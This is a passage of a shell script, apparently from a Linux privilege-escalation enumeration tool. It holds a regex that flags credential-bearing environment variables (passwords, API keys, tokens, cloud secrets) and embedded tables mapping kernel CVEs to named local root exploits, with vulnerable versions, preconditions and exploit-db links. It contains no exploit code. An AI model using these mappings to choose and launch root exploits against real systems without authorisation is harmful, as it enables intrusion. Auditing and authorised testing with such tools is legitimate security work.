   1183 NoEnvVars="LESS_TERMCAP|JOURNAL_STREAM|XDG_SESSION|DBUS_SESSION|systemd\/sessions|systemd_exec|MEMORY_PRESSURE_WATCH|RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs|USEFUL_SOFTWARE|PSTORAGE_|^PATH=|^INVOCATION_ID=|^WATCHDOG_PID=|^LISTEN_PID="
   1184 
   1185 EnvVarsRed="[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME|[aA][pP][iI][_][kK][eE][yY]|[aA][wW][sS]|[aA][zZ][uU][rR][eE]|[gG][cC][pP]|[aA][pP][iI]|[sS][eE][cC][rR][eE][tT]|[sS][qQ][lL]|[dD][aA][tT][aA][bB][aA][sS][eE]|[tT][oO][kK][eE][nN]"
   1186 
   1187 commonrootdirsG="^/$|/bin$|/boot$|/.cache$|/cdrom|/dev$|/etc$|/home$|/lost+found$|/lib$|/lib32$|libx32$|/lib64$|lost\+found|/media$|/mnt$|/opt$|/proc$|/root$|/run$|/sbin$|/snap$|/srv$|/sys$|/tmp$|/usr$|/var$"
   1188 
   1189 commonrootdirsMacG="^/$|/.DocumentRevisions-V100|/.fseventsd|/.PKInstallSandboxManager-SystemSoftware|/.Spotlight-V100|/.Trashes|/.vol|/Applications|/bin|/cores|/dev|/home|/Library|/macOS Install Data|/net|/Network|/opt|/private|/sbin|/System|/Users|/usr|/Volumes"
   1190 
   1191 # Contributor: Arjay Saguisa
   1192 # Max 25 rows per env variable to avoid hitting env variable size limits.
   1193 KERNEL_CVE_DATA_1="$(cat <<'EOF_DATA_1'
   1194 CVE-2004-1235	elflbl	pkg=linux-kernel,ver=2.4.29		1	
   1195 CVE-2004-1235	uselib()	pkg=linux-kernel,ver=2.4.29		1	Known to work only for 2.4 series (even though 2.6 is also vulnerable)
   1196 CVE-2004-1235	krad3	pkg=linux-kernel,ver>=2.6.5,ver<=2.6.11		1	
   1197 CVE-2004-0077	mremap_pte	pkg=linux-kernel,ver>=2.6.0,ver<=2.6.2		1	
   1198 CVE-2006-2451	raptor_prctl	pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17		1	
   1199 CVE-2006-2451	prctl	pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17		1	
   1200 CVE-2006-2451	prctl2	pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17		1	
   1201 CVE-2006-2451	prctl3	pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17		1	
   1202 CVE-2006-2451	prctl4	pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17		1	
   1203 CVE-2006-3626	h00lyshit	pkg=linux-kernel,ver>=2.6.8,ver<=2.6.16		1	
   1204 CVE-2008-0600	vmsplice1	pkg=linux-kernel,ver>=2.6.17,ver<=2.6.24		1	
   1205 CVE-2008-0600	vmsplice2	pkg=linux-kernel,ver>=2.6.23,ver<=2.6.24		1	
   1206 CVE-2008-4210	ftrex	pkg=linux-kernel,ver>=2.6.11,ver<=2.6.22		1	world-writable sgid directory and shell that does not drop sgid privs upon exec (ash/sash) are required
   1207 CVE-2008-4210	exit_notify	pkg=linux-kernel,ver>=2.6.25,ver<=2.6.29		1	
   1208 CVE-2009-2692	sock_sendpage (simple version)	pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30	ubuntu=7.10,RHEL=4,fedora=4|5|6|7|8|9|10|11	1	Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
   1209 CVE-2009-2692,CVE-2009-1895	sock_sendpage	pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30	ubuntu=9.04	1	/proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed
   1210 CVE-2009-2692,CVE-2009-1895	sock_sendpage2	pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30		1	Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
   1211 CVE-2009-2692,CVE-2009-1895	sock_sendpage3	pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30		1	/proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed
   1212 CVE-2009-2692,CVE-2009-1895	sock_sendpage (ppc)	pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30	ubuntu=8.10,RHEL=4|5	1	/proc/sys/vm/mmap_min_addr needs to equal 0
   1213 CVE-2009-2698	the rebel (udp_sendmsg)	pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19	debian=4	1	/proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed
   1214 CVE-2009-2698	hoagie_udp_sendmsg	pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86	debian=4	1	Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
   1215 CVE-2009-2698	katon (udp_sendmsg)	pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86	debian=4	1	Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
   1216 CVE-2009-2698	ip_append_data	pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86	fedora=4|5|6,RHEL=4	1	Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
   1217 CVE-2009-3547	pipe.c 1	pkg=linux-kernel,ver>=2.6.0,ver<=2.6.31		1	
   1218 CVE-2009-3547	pipe.c 2	pkg=linux-kernel,ver>=2.6.0,ver<=2.6.31		1	
   1219 EOF_DATA_1
   1220 )"
   1221 KERNEL_CVE_DATA_2="$(cat <<'EOF_DATA_2'
   1222 CVE-2009-3547	pipe.c 3	pkg=linux-kernel,ver>=2.6.0,ver<=2.6.31		1	
   1223 CVE-2010-3301	ptrace_kmod2	pkg=linux-kernel,ver>=2.6.26,ver<=2.6.34	debian=6.0{kernel:2.6.(32|33|34|35)-(1|2|trunk)-amd64},ubuntu=(10.04|10.10){kernel:2.6.(32|35)-(19|21|24)-server}	1	
   1224 CVE-2010-1146	reiserfs	pkg=linux-kernel,ver>=2.6.18,ver<=2.6.34	ubuntu=9.10	1	
   1225 CVE-2010-2959	can_bcm	pkg=linux-kernel,ver>=2.6.18,ver<=2.6.36	ubuntu=10.04{kernel:2.6.32-24-generic}	1	
   1226 CVE-2010-3904	rds	pkg=linux-kernel,ver>=2.6.30,ver<2.6.37	debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},ubuntu=10.04{kernel:2.6.32-(21|24)-generic}	1	
   1227 CVE-2010-3848,CVE-2010-3850,CVE-2010-4073	half_nelson	pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36	ubuntu=(10.04|9.10){kernel:2.6.(31|32)-(14|21)-server}	1	
   1228 N/A	caps_to_root	pkg=linux-kernel,ver>=2.6.34,ver<=2.6.36,x86	ubuntu=10.10	1	
   1229 N/A	caps_to_root 2	pkg=linux-kernel,ver>=2.6.34,ver<=2.6.36	ubuntu=10.10	1	
   1230 CVE-2010-4347	american-sign-language	pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36		1	
   1231 CVE-2010-3437	pktcdvd	pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36	ubuntu=10.04	1	
   1232 CVE-2010-3081	video4linux	pkg=linux-kernel,ver>=2.6.0,ver<=2.6.33	RHEL=5	1	
   1233 CVE-2012-0056	memodipper	pkg=linux-kernel,ver>=3.0.0,ver<=3.1.0	ubuntu=(10.04|11.10){kernel:3.0.0-12-(generic|server)}	1	
   1234 CVE-2012-0056,CVE-2010-3849,CVE-2010-3850	full-nelson	pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36	ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)},ubuntu=10.04{kernel:2.6.32-(21|24)-server}	1	
   1235 CVE-2013-1858	CLONE_NEWUSER|CLONE_FS	pkg=linux-kernel,ver=3.8,CONFIG_USER_NS=y		1	CONFIG_USER_NS needs to be enabled 
   1236 CVE-2013-2094	perf_swevent	pkg=linux-kernel,ver>=2.6.32,ver<3.8.9,x86_64	RHEL=6,ubuntu=12.04{kernel:3.2.0-(23|29)-generic},fedora=16{kernel:3.1.0-7.fc16.x86_64},fedora=17{kernel:3.3.4-5.fc17.x86_64},debian=7{kernel:3.2.0-4-amd64}	1	No SMEP/SMAP bypass
   1237 CVE-2013-2094	perf_swevent 2	pkg=linux-kernel,ver>=2.6.32,ver<3.8.9,x86_64	ubuntu=12.04{kernel:3.(2|5).0-(23|29)-generic}	1	No SMEP/SMAP bypass
   1238 CVE-2013-0268	msr	pkg=linux-kernel,ver>=2.6.18,ver<3.7.6		1	
   1239 CVE-2013-1959	userns_root_sploit	pkg=linux-kernel,ver>=3.0.1,ver<3.8.9		1	
   1240 CVE-2013-2094	semtex	pkg=linux-kernel,ver>=2.6.32,ver<3.8.9	RHEL=6	1	
   1241 CVE-2014-0038	timeoutpwn	pkg=linux-kernel,ver>=3.4.0,ver<=3.13.1,CONFIG_X86_X32=y	ubuntu=13.10	1	CONFIG_X86_X32 needs to be enabled
   1242 CVE-2014-0038	timeoutpwn 2	pkg=linux-kernel,ver>=3.4.0,ver<=3.13.1,CONFIG_X86_X32=y	ubuntu=(13.04|13.10){kernel:3.(8|11).0-(12|15|19)-generic}	1	CONFIG_X86_X32 needs to be enabled
   1243 CVE-2014-0196	rawmodePTY	pkg=linux-kernel,ver>=2.6.31,ver<=3.14.3		1	
   1244 CVE-2014-2851	use-after-free in ping_init_sock() (DoS)	pkg=linux-kernel,ver>=3.0.1,ver<=3.14		0	
   1245 CVE-2014-4014	inode_capable	pkg=linux-kernel,ver>=3.0.1,ver<=3.13	ubuntu=12.04	1	
   1246 CVE-2014-4699	ptrace/sysret	pkg=linux-kernel,ver>=3.0.1,ver<=3.8	ubuntu=12.04	1	
   1247 EOF_DATA_2
   1248 )"
   1249 KERNEL_CVE_DATA_3="$(cat <<'EOF_DATA_3'
   1250 CVE-2014-4943	PPPoL2TP (DoS)	pkg=linux-kernel,ver>=3.2,ver<=3.15.6		1	
   1251 CVE-2014-5207	fuse_suid	pkg=linux-kernel,ver>=3.0.1,ver<=3.16.1		1	
   1252 CVE-2015-9322	BadIRET	pkg=linux-kernel,ver>=3.0.1,ver<3.17.5,x86_64	RHEL<=7,fedora=20	1	
   1253 CVE-2015-3290	espfix64_NMI	pkg=linux-kernel,ver>=3.13,ver<4.1.6,x86_64		1	
   1254 N/A	bluetooth	pkg=linux-kernel,ver<=2.6.11		1	
   1255 CVE-2015-1328	overlayfs	pkg=linux-kernel,ver>=3.13.0,ver<=3.19.0	ubuntu=(12.04|14.04){kernel:3.13.0-(2|3|4|5)*-generic},ubuntu=(14.10|15.04){kernel:3.(13|16).0-*-generic}	1	
   1256 CVE-2015-8660	overlayfs (ovl_setattr)	pkg=linux-kernel,ver>=3.0.0,ver<=4.3.3		1	
   1257 CVE-2015-8660	overlayfs (ovl_setattr)	pkg=linux-kernel,ver>=3.0.0,ver<=4.3.3	ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic}	1	
   1258 CVE-2016-0728	keyring	pkg=linux-kernel,ver>=3.10,ver<4.4.1		0	Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working
   1259 CVE-2016-2384	usb-midi	pkg=linux-kernel,ver>=3.0.0,ver<=4.4.8	ubuntu=14.04,fedora=22	1	Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
   1260 CVE-2016-4997	target_offset	pkg=linux-kernel,ver>=4.4.0,ver<=4.4.0,cmd:grep -qi ip_tables /proc/modules	ubuntu=16.04{kernel:4.4.0-21-generic}	1	ip_tables.ko needs to be loaded
   1261 CVE-2016-4557	double-fdput()	pkg=linux-kernel,ver>=4.4,ver<4.5.5,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1	ubuntu=16.04{kernel:4.4.0-21-generic}	1	CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
   1262 CVE-2016-5195	dirtycow	pkg=linux-kernel,ver>=2.6.22,ver<=4.8.3	debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04	4	For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
   1263 CVE-2016-5195	dirtycow 2	pkg=linux-kernel,ver>=2.6.22,ver<=4.8.3	debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}	4	For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
   1264 CVE-2016-8655	chocobo_root	pkg=linux-kernel,ver>=4.4.0,ver<4.9,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1	ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}	1	CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled
   1265 CVE-2016-9793	SO_{SND|RCV}BUFFORCE	pkg=linux-kernel,ver>=3.11,ver<4.8.14,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1		1	CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only
   1266 CVE-2017-6074	dccp	pkg=linux-kernel,ver>=2.6.18,ver<=4.9.11,CONFIG_IP_DCCP=[my]	ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}	1	Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
   1267 CVE-2017-7308	af_packet	pkg=linux-kernel,ver>=3.2,ver<=4.10.6,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1	ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}	1	CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels
   1268 CVE-2017-16995	eBPF_verifier	pkg=linux-kernel,ver>=4.4,ver<=4.14.8,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1	debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic}	5	CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
   1269 CVE-2017-1000112	NETIF_F_UFO	pkg=linux-kernel,ver>=4.4,ver<=4.13,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1	ubuntu=14.04{kernel:4.4.0-*},ubuntu=16.04{kernel:4.8.0-*}	1	CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels
   1270 CVE-2017-1000253	PIE_stack_corruption	pkg=linux-kernel,ver>=3.2,ver<=4.13,x86_64	RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}	1	
   1271 CVE-2018-5333	rds_atomic_free_op NULL pointer dereference	pkg=linux-kernel,ver>=4.4,ver<=4.14.13,cmd:grep -qi rds /proc/modules,x86_64	ubuntu=16.04{kernel:4.4.0|4.8.0}	1	rds.ko kernel module needs to be loaded. Modified version at 'ext-url' adds support for additional targets and bypassing KASLR.
   1272 CVE-2018-14634	Mutagen Astronomy	pkg=linux-kernel,x86_64,ver>=4.14.1,ver<=4.14.54	debian=8,RHEL=6|7	1	systems with less than 32GB of RAM are unlikely to be affected by this issue
   1273 CVE-2018-18955	subuid_shell	pkg=linux-kernel,ver>=4.15,ver<=4.19.2,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1,cmd:[ -u /usr/bin/newuidmap ],cmd:[ -u /usr/bin/newgidmap ]	ubuntu=18.04{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28}	1	CONFIG_USER_NS needs to be enabled
   1274 CVE-2019-13272	PTRACE_TRACEME	pkg=linux-kernel,ver>=4,ver<5.1.17,sysctl:kernel.yama.ptrace_scope==0,x86_64	ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},debian=10{kernel:4.19.0-*},fedora=30{kernel:5.0.9-*}	1	Requires an active PolKit agent.
   1275 EOF_DATA_3
   1276 )"
   1277 KERNEL_CVE_DATA_4="$(cat <<'EOF_DATA_4'
   1278 CVE-2019-15666	XFRM_UAF	pkg=linux-kernel,ver>=3,ver<5.0.19,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1,CONFIG_XFRM=y		1	CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
   1279 CVE-2021-27365	linux-iscsi	pkg=linux-kernel,ver<=5.11.3,CONFIG_SLAB_FREELIST_HARDENED!=y	RHEL=8	1	CONFIG_SLAB_FREELIST_HARDENED must not be enabled
   1280 CVE-2021-3490	eBPF ALU32 bounds tracking for bitwise ops	pkg=linux-kernel,ver>=5.7,ver<5.12,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1	ubuntu=20.04{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*}	5	CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
   1281 CVE-2021-3493	Ubuntu OverlayFS	pkg=linux-kernel,ver>=3.13,ver<5.14,x86_64	ubuntu=(14.04|16.04|18.04|20.04|20.10)	1	Only Ubuntu is affected.
   1282 CVE-2021-22555	Netfilter heap out-of-bounds write	pkg=linux-kernel,ver>=2.6.19,ver<=5.12-rc6	ubuntu=20.04{kernel:5.8.0-*}	1	ip_tables kernel module must be loaded
   1283 CVE-2022-0847	DirtyPipe	pkg=linux-kernel,ver>=5.8,ver<=5.16.11	ubuntu=(20.04|21.04),debian=11	1	
   1284 CVE-2022-0995	watch_queue	pkg=linux-kernel,ver>=5.8,ver<5.16.5,x86_64	ubuntu=21.10{kernel:5.13.0.37-generic}	1	Not 100% reliable, may need to be run a couple of times. It rare cases it may panic the kernel.
   1285 CVE-2022-2586	nft_object UAF	pkg=linux-kernel,ver>=5.12,ver<5.19,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1	ubuntu=(20.04){kernel:5.12.13}	1	kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
   1286 CVE-2022-32250	nft_object UAF (NFT_MSG_NEWSET)	pkg=linux-kernel,ver<5.18.1,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1	ubuntu=(22.04){kernel:5.15.0-27-generic}	1	kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
   1287 CVE-2023-0386	OverlayFS suid smuggle	pkg=linux-kernel,ver>=5.11,ver<=6.2,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1	ubuntu=22.04.1{kernel:5.15.0-57-generic}	1	CONFIG_USER_NS needs to be enabled && kernel.unprivileged_userns_clone=1 required
   1288 CVE-2024-1086	double-free in nf_tables	pkg=linux-kernel,x86_64,ver>=5.14,ver<=6.6,CONFIG_NF_TABLES=y,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1	debian=12,ubuntu=22.04	1	CONFIG_USER_NS and CONFIG_NF_TABLES need to be enabled && kernel.unprivileged_userns_clone=1 required
   1289 CVE-2021-3560	Polkit race authentication bypass	cmd:sh -c "apt list --installed 2>/dev/null | grep -E 'polkit.*0\\.105-26' | grep -qEv 'ubuntu1\\.[1-9]' || yum list installed 2>/dev/null | grep -qE 'polkit.*\\(0\\.117-2\\|0\\.115-6\\|0\\.11[3-9]\\)' || rpm -qa 2>/dev/null | grep -qE 'polkit.*\\(0\\.117-2\\|0\\.115-6\\|0\\.11[3-9]\\)'"		1	Migrated from former standalone 1_system_information check
   1290 CVE-2025-38352	POSIX CPU timers race	pkg=linux-kernel,ver>=6.12,ver<6.12.34,CONFIG_POSIX_CPU_TIMERS_TASK_WORK!=y		1	Migrated from former standalone 1_system_information check
   1291 af_packet	2016-8655	4.4.0		http://www.exploit-db.com/exploits/40871
   1292 american-sign-language	2010-4347	2.6.0,2.6.1,2.6.2,2.6.3,2.6.4,2.6.5,2.6.6,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36		http://www.securityfocus.com/bid/45408
   1293 ave		2.4.19,2.4.20		
   1294 brk		2.4.10,2.4.18,2.4.19,2.4.20,2.4.21,2.4.22		
   1295 can_bcm	2010-2959	2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36		http://www.exploit-db.com/exploits/14814
   1296 caps_to_root	n/a	2.6.34,2.6.35,2.6.36		http://www.exploit-db.com/exploits/15916
   1297 clone_newuser	N\A	3.3.5,3.3.4,3.3.2,3.2.13,3.2.9,3.2.1,3.1.8,3.0.5,3.0.4,3.0.2,3.0.1,3.2,3.0.1,3.0		http://www.exploit-db.com/exploits/38390
   1298 dirty_cow	2016-5195	2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36,2.6.37,2.6.38,2.6.39,3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6,3.1.0,3.2.0,3.3.0,3.4.0,3.5.0,3.6.0,3.7.0,3.7.6,3.8.0,3.9.0		http://www.exploit-db.com/exploits/40616
   1299 CVE-2010-0415	do_pages_move	2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31	sieve	1	Spenders Enlightenment
   1300 elfcd		2.6.12		
   1301 elfdump		2.4.27		
   1302 EOF_DATA_4
   1303 )"
   1304 KERNEL_CVE_DATA_5="$(cat <<'EOF_DATA_5'
   1305 elflbl		2.4.29		http://www.exploit-db.com/exploits/744
   1306 exit_notify		2.6.25,2.6.26,2.6.27,2.6.28,2.6.29		http://www.exploit-db.com/exploits/8369
   1307 exp.sh		2.6.9,2.6.10,2.6.16,2.6.13		
   1308 expand_stack		2.4.29		
   1309 CVE-2018-14665	exploit_x	2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36,2.6.37,2.6.38,2.6.39,3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6,3.1.0,3.2.0,3.3.0,3.4.0,3.5.0,3.6.0,3.7.0,3.7.6,3.8.0,3.9.0,3.10.0,3.11.0,3.12.0,3.13.0,3.14.0,3.15.0,3.16.0,3.17.0,3.18.0,3.19.0,4.0.0,4.1.0,4.2.0,4.3.0,4.4.0,4.5.0,4.6.0,4.7.0		1	http://www.exploit-db.com/exploits/45697
   1310 ftrex	2008-4210	2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22		http://www.exploit-db.com/exploits/6851
   1311 CVE-2017-16695	get_rekt	4.4.0,4.8.0,4.10.0,4.13.0		1	http://www.exploit-db.com/exploits/45010
   1312 h00lyshit	2006-3626	2.6.8,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16		http://www.exploit-db.com/exploits/2013
   1313 half_nelson1	2010-3848	2.6.0,2.6.1,2.6.2,2.6.3,2.6.4,2.6.5,2.6.6,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36	econet	http://www.exploit-db.com/exploits/17787
   1314 half_nelson2	2010-3850	2.6.0,2.6.1,2.6.2,2.6.3,2.6.4,2.6.5,2.6.6,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36	econet	http://www.exploit-db.com/exploits/17787
   1315 half_nelson3	2010-4073	2.6.0,2.6.1,2.6.2,2.6.3,2.6.4,2.6.5,2.6.6,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36	econet	http://www.exploit-db.com/exploits/17787
   1316 kdump		2.6.13		
   1317 km2		2.4.18,2.4.22		
   1318 krad		2.6.5,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11		
   1319 krad3		2.6.5,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11		http://exploit-db.com/exploits/1397
   1320 local26		2.6.13		
   1321 loginx		2.4.22		
   1322 loko		2.4.22,2.4.23,2.4.24		
   1323 memodipper	2012-0056	2.6.39,3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6,3.1.0		http://www.exploit-db.com/exploits/18411
   1324 mremap_pte		2.4.20,2.2.24,2.4.25,2.4.26,2.4.27		http://www.exploit-db.com/exploits/160
   1325 msr	2013-0268	2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36,2.6.37,2.6.38,2.6.39,3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6,3.1.0,3.2.0,3.3.0,3.4.0,3.5.0,3.6.0,3.7.0,3.7.6		http://www.exploit-db.com/exploits/27297
   1326 newlocal		2.4.17,2.4.19		
   1327 newsmp		2.6		
   1328 ong_bak		2.6.5		
   1329 overlayfs	2015-8660	3.13.0,3.16.0,3.19.0		http://www.exploit-db.com/exploits/39230
   1330 EOF_DATA_5
   1331 )"
   1332 KERNEL_CVE_DATA_6="$(cat <<'EOF_DATA_6'
   1333 packet_set_ring	2017-7308	4.8.0		http://www.exploit-db.com/exploits/41994
   1334 perf_swevent	2013-2094	3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6,3.1.0,3.2.0,3.3.0,3.4.0,3.4.1,3.4.2,3.4.3,3.4.4,3.4.5,3.4.6,3.4.8,3.4.9,3.5.0,3.6.0,3.7.0,3.8.0,3.8.1,3.8.2,3.8.3,3.8.4,3.8.5,3.8.6,3.8.7,3.8.8,3.8.9		http://www.exploit-db.com/exploits/26131
   1335 pipe.c_32bit	2009-3547	2.4.4,2.4.5,2.4.6,2.4.7,2.4.8,2.4.9,2.4.10,2.4.11,2.4.12,2.4.13,2.4.14,2.4.15,2.4.16,2.4.17,2.4.18,2.4.19,2.4.20,2.4.21,2.4.22,2.4.23,2.4.24,2.4.25,2.4.26,2.4.27,2.4.28,2.4.29,2.4.30,2.4.31,2.4.32,2.4.33,2.4.34,2.4.35,2.4.36,2.4.37,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31		http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
   1336 pktcdvd	2010-3437	2.6.0,2.6.1,2.6.2,2.6.3,2.6.4,2.6.5,2.6.6,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36		http://www.exploit-db.com/exploits/15150
